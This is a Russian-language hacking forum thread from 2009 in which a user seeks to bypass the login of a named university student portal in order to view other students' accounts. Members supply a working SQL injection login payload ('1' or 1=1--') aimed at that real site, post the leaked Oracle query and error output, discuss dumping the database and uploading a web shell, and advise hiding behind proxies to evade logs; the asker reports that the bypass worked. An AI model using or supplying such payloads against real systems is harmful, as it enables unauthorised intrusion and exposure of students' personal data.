обойти авторизацию

Discussion in 'Песочница' started by Raz0rnsk, 6 Aug 2009.

  1. Raz0rnsk

    Raz0rnsk New Member

    Joined:
    14 Jul 2009
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Здраввуйте.
    Мне зотелось бы обойти авторизазию, если возможно.
    http://ciu.nstu.ru/student_study/
    сканером XSpider 7.7 просканировал порты и на уязвимости.

    выдало немало уязвимостей, подскажите можно ли из этого что-то получить и насколько сложно реализовать?
    сведение о сервере
    вот например

     
  2. -JC-

    -JC- Member

    Joined:
    10 Mar 2009
    Messages:
    54
    Likes Received:
    18
    Reputations:
    11
    На неавторизированный доступ попробуй искать эксплоиты.
     
  3. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Ну началось :d
     
    1 person likes this.
  4. Raz0rnsk

    Raz0rnsk New Member

    Joined:
    14 Jul 2009
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    вот нашел экплоит для апатча 2.2.3

    http://milw0rm.com/exploits/2237

    не понял как запустить на сервере, получается мне его залить надо туда, а доступа-то нет=)
     
  5. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Raz0rnsk

    Послушай совета, сотри сейчас XSpider с компа, и не ставь его больше НИКОГДА!

    Это инструмент для аудита безопасности, а не для взлома. Если ты не понимаешь его отчёты, то он тебе нахер не нужен, кроме того, что ты засираешь логи сервака ничего ты с его помошью не сделаешь.

    По "уязвимостям"

    Ну прочитай ты что он пишет:

    1 ...позволить локальным пользователям использовать...
    2 ...обойти ограничения safe_mode и open_basedir...
    3 ...обойти ограничения safe_mode...
    4 ...проводить неавторизованные операции над некорректными каталогами...

    Ты что, локальный пользователь?

    Давайте в этой теме подискутируем, зачем вы юзаете XSpider (и аналоги), я просто таких тем с отчётами удалил уже хрен знает сколько, мне просто интересно, это модно, или что?
     
    1 person likes this.
  6. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    jokester, а ты его не юзаешь что ли?(
     
  7. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Мне на лицензию мама денег не даёт, а кряки я боюсь качать, говорят там вирусы, они могут своровать мой пароль от контакта и сбросить мой комп :(

    Щас вот мне расскажут зачем его юзать, я покажу тему родителям, и они мне купят лицензию на день рождения
     
  8. Raz0rnsk

    Raz0rnsk New Member

    Joined:
    14 Jul 2009
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    была такая мысль :)

    что предложите?:)
     
  9. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Предложу заюзать скуль в авторизации :)

    ' or 1=1--
    Ну а если что-то непонятно, то почитать статьи
     
    1 person likes this.
  10. Kusto

    Kusto Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    886
    Likes Received:
    678
    Reputations:
    510
    блин jokester я те неустаю поражаться я думал что ' or 1=1 уже канула в лету
     
  11. Raz0rnsk

    Raz0rnsk New Member

    Joined:
    14 Jul 2009
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    шутку не оценил, насчет почитать статьи это и сам знаю, я спрашивал конкретно, в связи с типом сервера и тд

    а свой лог/пасс у меня есть, мне надо чужие просмотреть :)
     
    #11 Raz0rnsk, 9 Aug 2009
    Last edited: 9 Aug 2009
  12. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Ну вообще-то я не шутил, там скуль в авторизации войти можно вставив в поле логин значение
    1' or 1=1-- а поле пароль любое.

    А статьи я рекомендовал почитать, если непонятно, что именно я тебе посоветовал. И если ты всё-же последуешь моему совету и сделаешь это, то возможно поймёшь как можно зайти под ЛЮБЫМ пользователем.

    FireFenix

    Вы тут что, издеваетесь что-ли все? Я для кого это писал вообще?
     
  13. fraIzer

    fraIzer Member

    Joined:
    27 Jul 2009
    Messages:
    11
    Likes Received:
    8
    Reputations:
    0
    Кроме шуток, чем тебя не устраивает классическая инъекция в where в поле авторизации?

    Запрос у нас будет выглядеть примерно следующим образом:
    Code:
    SELECT t.*, st.family_name || ' ' || st.name || ' ' || st.patronymic_name FIO, st.sex FROM okuser.NODEUSERS t join decanatuser.student st on st.pk=t.idstudent WHERE t.SLOGIN='1' or 1=1--' and t.SPASSWORD='D6581D542C7EAF801284F084478B5FCC' and t.idstudent is not NULL [nativecode=ORA-00936: missing expression]
     
    1 person likes this.
  14. mr.gr33n

    mr.gr33n Banned

    Joined:
    6 Jul 2009
    Messages:
    47
    Likes Received:
    68
    Reputations:
    6
    Насчёт or 1=1, попадались пару сайтов сделаных в 2008 - 2009 годах,в админке проканал данный способ, залил шелл))
    Мораль такова: надо пробывать все возможные способы, ну для начало почитать статьи которых на ачате полно, а потом задавать вопросы)
     
  15. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    Джокстер просто неумеет хакерствовать с хспайдером вот и завидует
     
  16. Raz0rnsk

    Raz0rnsk New Member

    Joined:
    14 Jul 2009
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    сори, что погорячился.
    получилось :)
    но я вообще хотел, зная вид(по своим данным), заходить под конкретным пользователем, может базу как-то слить?:)
    а раз проканывает заходить под 1' or 1=1--, шелл получится залить?
     
  17. Raz0rnsk

    Raz0rnsk New Member

    Joined:
    14 Jul 2009
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    ввел в логин

    получил

    К сожалению, в настоящий момент продолжение работы невозможно. Примите извинения за доставленные неудобства.
    ошибка при попытке авторизации студента
    ошибка БД: SELECT t.*, st.family_name || ' ' || st.name || ' ' || st.patronymic_name FIO, st.sex FROM okuser.NODEUSERS t join decanatuser.student st on st.pk=t.idstudent WHERE t.SLOGIN='SELECT t.*, st.family_name || ' ' || st.name || ' ' || st.patronymic_name FIO, st.sex FROM okuser.NODEUSERS t join decanatuser.student st on st.pk=t.idstudent WHERE t.SLOGIN='1' or 1=1--' and t.SPASSWORD='D6581D542C7EAF801284F084478B5FCC' and t.idstudent is not NULL [nativecode=ORA-00936' and t.SPASSWORD='9862C0CBF9702F2883680ACFFE8768DD' and t.idstudent is not NULL [nativecode=ORA-01756: quoted string not properly terminated]
    файл: /www/web/sites/student_study/index.php:55
     
  18. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    438
    Reputations:
    90
    еммм ты хотяб предохраняешься?)
    юзай http://hidemyass.com/ или proxya.ru
    а то логи-то сохраняются))смотри свои данные не пиши)
     
  19. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    ТС, https://forum.antichat.ru/thread40576.html
    пока 4 раза не перечитаешь эту статью, больше сюда не пиши
     
Loading...
Similar Threads - обойти авторизацию
  1. Flashid
    Replies:
    3
    Views:
    2,499